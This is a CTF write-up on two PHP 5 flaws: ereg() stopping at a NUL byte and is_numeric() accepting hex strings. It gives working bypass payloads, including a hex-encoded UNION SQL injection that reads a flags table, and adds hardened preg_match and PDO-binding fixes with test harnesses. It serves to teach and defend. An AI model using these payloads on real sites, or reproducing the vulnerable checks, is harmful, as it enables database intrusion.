CTF web challenge notes: PHP function vulnerabilities
阿新 • Published: 2018-12-23
Summary of PHP function vulnerabilities
1. ereg() truncation vulnerability
Code:
<?php
session_start();
if (isset($_POST['submit'])) {
    $verifycode = $_POST['verifycode'];
    $b = false;
    // ereg() (PHP 5 only, removed in PHP 7) is not binary-safe: it reads the
    // subject only up to the first NUL byte, so "9\0..." still matches ^[1-9]+$.
    if (@ereg("^[1-9]+$", $verifycode) === FALSE) {
        $b = false;
        echo 'b is false';
    }
    // strpos() is binary-safe and sees the whole string, including everything after the NUL.
    else if (strpos($verifycode, 'xiaoboshifudaiwofei') !== FALSE) {
        $b = true;
        echo 'b is true';
    }
}
?>
Payload (value of the verifycode POST field, sent together with the submit field; %00 is the URL-encoded NUL byte, which ereg() treats as the end of the string while strpos() keeps reading past it):
9%00xiaoboshifudaiwofei
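The binary-safe way to write the same check, as an added example that is not part of the original write-up. verifycode_is_valid() and the sample inputs are mine; the legacy ereg() function is only called on PHP 5, where ereg() still exists, and the harness skips it on newer versions. The code avoids PHP 7 syntax so it runs on both.

```php
<?php
// Added example, not from the original write-up. ereg() (PHP 5 only) stops
// reading its subject at the first NUL byte; preg_match() is binary-safe.
// Written without PHP 7 syntax so that it also runs on PHP 5 for contrast.

// Hardened check: \A and \z anchor to the absolute start and end of the
// subject. A bare $ (without the D modifier) would still accept "9\n", the
// same class of bypass with a different trailing byte.
function verifycode_is_valid($verifycode)
{
    return preg_match('/\A[1-9]+\z/', $verifycode) === 1;
}

// The challenge's original check, for contrast. Only callable on PHP 5.
function verifycode_is_valid_legacy($verifycode)
{
    return @ereg('^[1-9]+$', $verifycode) !== false;
}

// Constructed inputs. The second entry is the write-up's payload with %00
// decoded to a real NUL byte, which is what PHP sees after parsing the POST body.
$cases = array(
    array('9',                      true),
    array("9\0xiaoboshifudaiwofei", false),   // NUL truncation payload
    array("9\n",                    false),   // trailing newline: $ vs \z
    array('0',                      false),
    array('xiaoboshifudaiwofei',    false),
);

foreach ($cases as $case) {
    list($input, $expected) = $case;
    $got  = verifycode_is_valid($input);
    $line = sprintf('%-30s preg_match: %-5s', json_encode($input), var_export($got, true));
    if (function_exists('ereg')) {   // PHP 5: shows the truncation bug side by side
        $line .= sprintf('  ereg: %-5s', var_export(verifycode_is_valid_legacy($input), true));
    }
    echo $line, ($got === $expected ? '' : '  <-- unexpected'), "\n";
}
```

On PHP 5 the ereg column reports true for the NUL payload while the preg_match column reports false; on PHP 7 and later only the preg_match column is printed. The "9\n" row is there because switching to preg_match with the original `^[1-9]+$` pattern would trade the NUL bypass for a newline bypass.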
2. is_numeric() vulnerability
Code:
if (!is_numeric($page)) {
    die("page must be a number!");
}
if ($page < 1) $page = 1;
// $page is concatenated straight into the statement: is_numeric() is the only protection.
$sql = "update page set num=$page";
$res = mysql_my_query($sql);   // the challenge's own query wrapper
if ($res) {
    echo "<script>alert('update success!');</script>";
    echo("<script>location.href='./index.php?action=admin&mode=index'</script>");
} else {
    echo "<script>alert('update fail!');</script>";
    die();
}
is_numeric() in PHP 5.x has a defect (fixed in PHP 7.0): it accepts hexadecimal strings such as 0x... as numbers. PHP 5 applied the same rule when comparing a string with an integer, so the $page<1 clamp does not trigger either, and the hex string reaches the query unchanged, where MySQL reads 0x... as a hex literal and decodes it back to the original bytes. The injected query text is hex-encoded like so:
import binascii
a = '1 union all select flag,flag,flag,flag from flags'
print(binascii.hexlify(a.encode()).decode())   # Python 3; on Python 2, binascii.hexlify(a) returns the str directly
# 3120756e696f6e20616c6c2073656c65637420666c61672c666c61672c666c61672c666c61672066726f6d20666c616773
page parameter (the hex string with the 0x prefix):
0x3120756e696f6e20616c6c2073656c65637420666c61672c666c61672c666c61672c666c61672066726f6d20666c616773
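A hardened version of the update, added here as an example and not part of the original challenge code. parse_page(), to_mysql_hex_literal() and update_page() are my names; update_page() assumes an existing PDO connection and is only defined, not called, so the rest of the script runs without a database and shows what is_numeric() accepts against what strict validation accepts.

```php
<?php
// Added example, not from the original write-up. is_numeric() accepted
// hexadecimal strings on PHP 5 and does not on PHP 7+, but the fix is not
// "upgrade PHP": validate the exact shape you need and bind the value,
// instead of splicing it into the statement.

// Strict integer validation. FILTER_VALIDATE_INT rejects "0x..." (hex is only
// accepted with FILTER_FLAG_ALLOW_HEX) as well as "1.0" and "1e3", all of
// which is_numeric() accepts. Returns null on failure, otherwise the clamped
// page number, mirroring the original "if ($page < 1) $page = 1".
function parse_page($raw)
{
    $n = filter_var($raw, FILTER_VALIDATE_INT);
    if ($n === false) {
        return null;
    }
    return max(1, $n);
}

// The write-up's payload encoder in PHP: MySQL reads 0x<hex> as a hex literal
// and decodes it back to the original bytes.
function to_mysql_hex_literal($s)
{
    return '0x' . bin2hex($s);
}

// Hardened version of the update. The value is bound as an integer, so no
// numeric-looking string can alter the statement. $pdo is assumed to be an
// existing PDO connection to the challenge database; nothing here opens one.
function update_page(PDO $pdo, $raw)
{
    $page = parse_page($raw);
    if ($page === null) {
        return false;            // the original's "page must be a number!" path
    }
    $stmt = $pdo->prepare('UPDATE page SET num = :num');
    $stmt->bindValue(':num', $page, PDO::PARAM_INT);
    return $stmt->execute();
}

$payload = to_mysql_hex_literal('1 union all select flag,flag,flag,flag from flags');
echo "payload: $payload\n";

// Constructed candidates: what is_numeric() says versus what parse_page() accepts.
// On PHP 5 the last row reports is_numeric=true; on PHP 7+ it reports false.
foreach (array('1', '42', '0', '-5', '1.0', '1e3', $payload) as $candidate) {
    $shown = strlen($candidate) > 12 ? substr($candidate, 0, 12) . '...' : $candidate;
    printf("%-18s is_numeric=%-5s parse_page=%s\n",
        var_export($shown, true),
        var_export(is_numeric($candidate), true),
        var_export(parse_page($candidate), true));
}
```

The point of binding with PDO::PARAM_INT rather than only validating is defence in depth: even if a future PHP release or a different validator lets an odd numeric form through, the driver sends it as a parameter, not as statement text, so the `union` in the decoded payload can never be parsed as SQL.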